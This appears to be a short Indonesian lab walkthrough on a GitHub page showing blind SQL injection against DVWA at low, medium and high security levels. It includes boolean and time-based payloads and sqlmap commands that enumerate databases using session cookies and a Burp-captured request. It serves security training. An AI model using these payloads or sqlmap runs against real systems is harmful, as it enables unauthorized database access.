Skip to content

Latest commit

 

History

History
48 lines (33 loc) · 2.13 KB

SQL Injection Blind.md

File metadata and controls

48 lines (33 loc) · 2.13 KB

SQL Injection (Blind)

Blind SQL Injection muncul ketika aplikasi rentan terhadap SQL Injection, tetapi respons HTTP-nya tidak berisi hasil kueri SQL yang relevan atau detail kesalahan basis data apa pun.

Security Low

1' and length(database())=4#

alt text

  • Menemukan database dengan tool sqlmap
sqlmap -u "http://<IP_Server>/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=hash; security=low" --dbs

alt text

alt text

Security Medium

  • Lakukan injeksi pada tag <option> menggunakan inspect element di browser
1 and sleep(5)

alt text

  • Kembali ke halaman seperti semula, tangkap request pada halaman SQL Injection (Blind) dengan Security Medium menggunakan tool Burp Suite. Klik kanan pada kolom Request dan pilih Save Item

alt text

alt text

alt text

  • Lakukan SQL Injection pada request dengan tool sqlmap
sqlmap -r nama_file_request --dbs

alt text

alt text

Security High

sqlmap -u "http://<IP_Server>/DVWA/vulnerabilities/sqli_blind/?id=1" --cookie="PHPSESSID=hash; security=high" --dbs